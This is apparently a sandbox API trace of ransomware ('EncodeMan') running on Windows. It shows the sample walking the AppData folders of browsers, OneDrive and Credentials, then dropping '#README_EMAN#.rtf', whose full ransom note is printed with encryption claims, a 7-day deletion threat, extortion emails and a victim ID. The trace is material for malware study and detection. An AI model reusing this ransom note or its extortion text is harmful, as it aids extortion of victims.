lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tt\\", cchCount2=73) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tt\\", cchCount2=73) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tt\\", cchCount2=73) returned 3 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tt\\", cchCount2=73) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tg-cyrl\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\tt\\", cchCount2=73) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 3 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 2 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\", cchCount2=66) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\", cchCount2=66) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ur\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\", cchCount2=66) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\", cchCount2=66) returned 3 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\", cchCount2=66) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 3 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\", cchCount1=125, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 3 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 3 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 2 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\", cchCount1=75, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sw\\", cchCount2=73) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sw\\", cchCount2=73) returned 3 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\QtQuick\\Controls.2\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sw\\", cchCount2=73) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sd-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sw\\", cchCount2=73) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sl\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sw\\", cchCount2=73) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ta\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneNote\\16.0\\cache\\", cchCount1=65, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 1 [0301.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount1=93, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\", cchCount2=93) returned 2 [0301.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount2=70) returned 3 [0301.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount2=70) returned 1 [0301.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\", cchCount1=58, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount2=70) returned 1 [0301.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\", cchCount2=70) returned 2 [0301.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\", cchCount2=73) returned 1 [0301.457] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\#readme_eman#.rtf")) returned 0x20 [0301.457] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf")) returned 0x20 [0301.457] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0301.457] GetLastError () returned 0x2 [0301.457] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 